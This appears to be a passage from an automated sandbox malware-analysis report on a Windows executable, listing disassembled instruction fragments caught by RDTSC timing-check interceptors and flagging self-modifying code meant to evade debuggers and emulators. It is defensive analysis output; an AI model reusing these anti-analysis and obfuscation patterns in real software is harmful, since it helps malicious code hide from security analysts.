Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 7600E39 second address: 7600E60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7C49018EE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebx+70h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7C49018EDDh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 7600E60 second address: 7600E66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 7600E66 second address: 7600E6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 7600E6A second address: 7600EA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 00000001h 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F7C48CABF25h 0x00000011 adc ax, 0336h 0x00000016 jmp 00007F7C48CABF21h 0x0000001b popfd 0x0000001c popad 0x0000001d nop 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 7600EA9 second address: 7600EDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F7C49018EE5h 0x0000000a sub eax, 39950F46h 0x00000010 jmp 00007F7C49018EE1h 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 7600EDC second address: 7600EEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7C48CABF1Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 7600EEC second address: 7600F3A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7C49018EDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F7C49018EE9h 0x00000011 nop 0x00000012 jmp 00007F7C49018EDEh 0x00000017 lea eax, dword ptr [ebp-18h] 0x0000001a pushad 0x0000001b mov dl, al 0x0000001d pushad 0x0000001e push edi 0x0000001f pop esi 0x00000020 push ebx 0x00000021 pop esi 0x00000022 popad 0x00000023 popad 0x00000024 push ecx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 7600F3A second address: 7600F40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 7600F40 second address: 7600F46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 7600F46 second address: 7600F4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 7600F4A second address: 7600F4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 7600F4E second address: 7600F5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 7600F5F second address: 7600F63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 7600F63 second address: 7600F69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 7600FAD second address: 7600FE2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7C49018EE6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edi, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7C49018EE7h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 7600FE2 second address: 760103D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, ch 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test edi, edi 0x0000000a pushad 0x0000000b jmp 00007F7C48CABF23h 0x00000010 call 00007F7C48CABF28h 0x00000015 mov edx, ecx 0x00000017 pop esi 0x00000018 popad 0x00000019 js 00007F7CB6FDA5A9h 0x0000001f pushad 0x00000020 mov esi, edx 0x00000022 push eax 0x00000023 push edx 0x00000024 call 00007F7C48CABF25h 0x00000029 pop esi 0x0000002a rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 760103D second address: 7601063 instructions: 0x00000000 rdtsc 0x00000002 mov dx, F9F4h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 mov eax, dword ptr [ebp-14h] 0x0000000c jmp 00007F7C49018EE3h 0x00000011 mov ecx, esi 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 7601063 second address: 760107A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F7C48CABF21h 0x00000009 pop ecx 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 760107A second address: 7601138 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7C49018EDEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+0Ch], eax 0x0000000c pushad 0x0000000d jmp 00007F7C49018EDEh 0x00000012 pushfd 0x00000013 jmp 00007F7C49018EE2h 0x00000018 and eax, 4B2E6868h 0x0000001e jmp 00007F7C49018EDBh 0x00000023 popfd 0x00000024 popad 0x00000025 mov edx, 759B06ECh 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007F7C49018EE4h 0x00000031 xor esi, 21663AC8h 0x00000037 jmp 00007F7C49018EDBh 0x0000003c popfd 0x0000003d mov ecx, 6321283Fh 0x00000042 popad 0x00000043 sub eax, eax 0x00000045 jmp 00007F7C49018EDBh 0x0000004a lock cmpxchg dword ptr [edx], ecx 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 pushad 0x00000052 popad 0x00000053 pushfd 0x00000054 jmp 00007F7C49018EE1h 0x00000059 and ecx, 2F8EEA96h 0x0000005f jmp 00007F7C49018EE1h 0x00000064 popfd 0x00000065 popad 0x00000066 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 7601138 second address: 7601192 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7C48CABF21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a pushad 0x0000000b mov ebx, esi 0x0000000d movzx esi, di 0x00000010 popad 0x00000011 test eax, eax 0x00000013 pushad 0x00000014 call 00007F7C48CABF21h 0x00000019 mov dl, cl 0x0000001b pop edi 0x0000001c pushad 0x0000001d jmp 00007F7C48CABF28h 0x00000022 popad 0x00000023 popad 0x00000024 jne 00007F7CB6FDA46Bh 0x0000002a pushad 0x0000002b push eax 0x0000002c push edx 0x0000002d push ecx 0x0000002e pop edi 0x0000002f rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 7601192 second address: 76011CF instructions: 0x00000000 rdtsc 0x00000002 mov edi, ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 mov bl, 4Dh 0x00000009 pop esi 0x0000000a popad 0x0000000b mov edx, dword ptr [ebp+08h] 0x0000000e jmp 00007F7C49018EDFh 0x00000013 mov eax, dword ptr [esi] 0x00000015 jmp 00007F7C49018EE6h 0x0000001a mov dword ptr [edx], eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 76011CF second address: 76011D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 76011D5 second address: 76011DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 76011DB second address: 76011DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 76011DF second address: 760122A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7C49018EDEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi+04h] 0x0000000e jmp 00007F7C49018EE0h 0x00000013 mov dword ptr [edx+04h], eax 0x00000016 jmp 00007F7C49018EE0h 0x0000001b mov eax, dword ptr [esi+08h] 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F7C49018EDAh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 760122A second address: 7601239 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7C48CABF1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 7601239 second address: 7601251 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7C49018EE4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 7601251 second address: 7601278 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+08h], eax 0x0000000b pushad 0x0000000c mov ax, bx 0x0000000f mov di, 00CCh 0x00000013 popad 0x00000014 mov eax, dword ptr [esi+0Ch] 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F7C48CABF1Eh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 7601278 second address: 760127E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 760127E second address: 7601282 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 7601282 second address: 76012BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+0Ch], eax 0x0000000b jmp 00007F7C49018EE9h 0x00000010 mov eax, dword ptr [esi+10h] 0x00000013 pushad 0x00000014 popad 0x00000015 mov dword ptr [edx+10h], eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F7C49018EDBh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 76012BB second address: 76012C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 76012C1 second address: 760137C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7C49018EDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi+14h] 0x0000000e jmp 00007F7C49018EE6h 0x00000013 mov dword ptr [edx+14h], eax 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F7C49018EDEh 0x0000001d and ax, 6738h 0x00000022 jmp 00007F7C49018EDBh 0x00000027 popfd 0x00000028 pushfd 0x00000029 jmp 00007F7C49018EE8h 0x0000002e add cl, FFFFFF98h 0x00000031 jmp 00007F7C49018EDBh 0x00000036 popfd 0x00000037 popad 0x00000038 mov eax, dword ptr [esi+18h] 0x0000003b pushad 0x0000003c movzx esi, bx 0x0000003f pushfd 0x00000040 jmp 00007F7C49018EE1h 0x00000045 xor ecx, 17262F36h 0x0000004b jmp 00007F7C49018EE1h 0x00000050 popfd 0x00000051 popad 0x00000052 mov dword ptr [edx+18h], eax 0x00000055 push eax 0x00000056 push edx 0x00000057 jmp 00007F7C49018EDDh 0x0000005c rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 760137C second address: 76013F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7C48CABF21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+1Ch] 0x0000000c jmp 00007F7C48CABF1Eh 0x00000011 mov dword ptr [edx+1Ch], eax 0x00000014 pushad 0x00000015 jmp 00007F7C48CABF1Eh 0x0000001a pushfd 0x0000001b jmp 00007F7C48CABF22h 0x00000020 and esi, 1632AB18h 0x00000026 jmp 00007F7C48CABF1Bh 0x0000002b popfd 0x0000002c popad 0x0000002d mov eax, dword ptr [esi+20h] 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F7C48CABF25h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 76013F4 second address: 7601412 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7C49018EE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+20h], eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov di, si 0x00000012 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 7601412 second address: 76014F5 instructions: 0x00000000 rdtsc 0x00000002 call 00007F7C48CABF26h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushfd 0x0000000b jmp 00007F7C48CABF1Bh 0x00000010 jmp 00007F7C48CABF23h 0x00000015 popfd 0x00000016 popad 0x00000017 mov eax, dword ptr [esi+24h] 0x0000001a pushad 0x0000001b call 00007F7C48CABF24h 0x00000020 call 00007F7C48CABF22h 0x00000025 pop esi 0x00000026 pop edx 0x00000027 popad 0x00000028 mov dword ptr [edx+24h], eax 0x0000002b pushad 0x0000002c mov di, 9D5Eh 0x00000030 call 00007F7C48CABF1Fh 0x00000035 pop ecx 0x00000036 popad 0x00000037 mov eax, dword ptr [esi+28h] 0x0000003a pushad 0x0000003b pushfd 0x0000003c jmp 00007F7C48CABF21h 0x00000041 adc al, FFFFFF96h 0x00000044 jmp 00007F7C48CABF21h 0x00000049 popfd 0x0000004a mov di, cx 0x0000004d popad 0x0000004e mov dword ptr [edx+28h], eax 0x00000051 jmp 00007F7C48CABF1Ah 0x00000056 mov ecx, dword ptr [esi+2Ch] 0x00000059 pushad 0x0000005a push eax 0x0000005b push edx 0x0000005c pushfd 0x0000005d jmp 00007F7C48CABF1Ch 0x00000062 xor esi, 0BDD4AE8h 0x00000068 jmp 00007F7C48CABF1Bh 0x0000006d popfd 0x0000006e rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 76014F5 second address: 76015B3 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F7C49018EE8h 0x00000008 sub eax, 16385D48h 0x0000000e jmp 00007F7C49018EDBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 call 00007F7C49018EE8h 0x0000001b mov edx, ecx 0x0000001d pop eax 0x0000001e popad 0x0000001f mov dword ptr [edx+2Ch], ecx 0x00000022 pushad 0x00000023 mov dx, 183Eh 0x00000027 pushfd 0x00000028 jmp 00007F7C49018EDFh 0x0000002d and si, 0CEEh 0x00000032 jmp 00007F7C49018EE9h 0x00000037 popfd 0x00000038 popad 0x00000039 mov ax, word ptr [esi+30h] 0x0000003d pushad 0x0000003e pushfd 0x0000003f jmp 00007F7C49018EDCh 0x00000044 and si, B468h 0x00000049 jmp 00007F7C49018EDBh 0x0000004e popfd 0x0000004f movzx esi, di 0x00000052 popad 0x00000053 mov word ptr [edx+30h], ax 0x00000057 push eax 0x00000058 push edx 0x00000059 jmp 00007F7C49018EDEh 0x0000005e rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 76015B3 second address: 76015B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 76015B9 second address: 7601687 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7C49018EDDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ax, word ptr [esi+32h] 0x0000000f pushad 0x00000010 jmp 00007F7C49018EDCh 0x00000015 call 00007F7C49018EE2h 0x0000001a call 00007F7C49018EE2h 0x0000001f pop esi 0x00000020 pop edx 0x00000021 popad 0x00000022 mov word ptr [edx+32h], ax 0x00000026 jmp 00007F7C49018EDEh 0x0000002b mov eax, dword ptr [esi+34h] 0x0000002e jmp 00007F7C49018EE0h 0x00000033 mov dword ptr [edx+34h], eax 0x00000036 jmp 00007F7C49018EE0h 0x0000003b test ecx, 00000700h 0x00000041 jmp 00007F7C49018EE0h 0x00000046 jne 00007F7CB7346F9Bh 0x0000004c pushad 0x0000004d pushfd 0x0000004e jmp 00007F7C49018EDEh 0x00000053 sbb esi, 2C8DBB78h 0x00000059 jmp 00007F7C49018EDBh 0x0000005e popfd 0x0000005f mov edi, esi 0x00000061 popad 0x00000062 or dword ptr [edx+38h], FFFFFFFFh 0x00000066 push eax 0x00000067 push edx 0x00000068 push eax 0x00000069 push edx 0x0000006a pushad 0x0000006b popad 0x0000006c rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 7601687 second address: 760168B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 760168B second address: 7601691 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 7601691 second address: 76016F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, CCBBh 0x00000007 push eax 0x00000008 pop edx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c or dword ptr [edx+3Ch], FFFFFFFFh 0x00000010 jmp 00007F7C48CABF1Ah 0x00000015 or dword ptr [edx+40h], FFFFFFFFh 0x00000019 jmp 00007F7C48CABF20h 0x0000001e pop esi 0x0000001f jmp 00007F7C48CABF20h 0x00000024 pop ebx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 jmp 00007F7C48CABF1Dh 0x0000002d jmp 00007F7C48CABF20h 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 7650D70 second address: 7650DA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7C49018EE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F7C49018EE1h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 7650DA6 second address: 7650DAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 7650DAA second address: 7650DBD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7C49018EDFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 75F080E second address: 75F0814 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 75F0814 second address: 75F0848 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7C49018EDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F7C49018EE9h 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push edx 0x00000018 pop ecx 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 75905AA second address: 75905C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7C48CABF24h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 75905C2 second address: 75905F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7C49018EDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F7C49018EE9h 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 75905F4 second address: 7590607 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7C48CABF1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 7590607 second address: 759060D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 759060D second address: 7590611 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 7590611 second address: 7590659 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b mov bl, AAh 0x0000000d push ecx 0x0000000e pushfd 0x0000000f jmp 00007F7C49018EE5h 0x00000014 adc cl, FFFFFFE6h 0x00000017 jmp 00007F7C49018EE1h 0x0000001c popfd 0x0000001d pop eax 0x0000001e popad 0x0000001f pop ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F7C49018EDAh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 7590659 second address: 759065E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 75E0910 second address: 75E0914 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 75E0914 second address: 75E091A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 75E091A second address: 75E0942 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7C49018EDFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7C49018EE0h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 75E0942 second address: 75E0951 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7C48CABF1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 75E0951 second address: 75E0957 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 75C0051 second address: 75C0078 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7C48CABF29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 44h 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov ax, 61F9h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 75C0078 second address: 75C00E5 instructions: 0x00000000 rdtsc 0x00000002 mov cx, 24B5h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push esi 0x0000000a jmp 00007F7C49018EDCh 0x0000000f mov dword ptr [esp], ebx 0x00000012 jmp 00007F7C49018EE0h 0x00000017 xchg eax, esi 0x00000018 jmp 00007F7C49018EE0h 0x0000001d push eax 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F7C49018EE1h 0x00000025 jmp 00007F7C49018EDBh 0x0000002a popfd 0x0000002b popad 0x0000002c xchg eax, esi 0x0000002d pushad 0x0000002e jmp 00007F7C49018EDBh 0x00000033 push eax 0x00000034 push edx 0x00000035 movzx ecx, di 0x00000038 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 75C00E5 second address: 75C00F4 instructions: 0x00000000 rdtsc 0x00000002 mov si, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 75C00F4 second address: 75C0103 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7C49018EDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 75C0103 second address: 75C012F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 call 00007F7C48CABF1Bh 0x0000000b pop eax 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], edi 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F7C48CABF22h 0x00000019 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Special instruction interceptor: First address: F8DB4F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Special instruction interceptor: First address: F8DA7D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Special instruction interceptor: First address: 112D1E3 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Special instruction interceptor: First address: 112BD82 instructions caused by: Self-modifying code
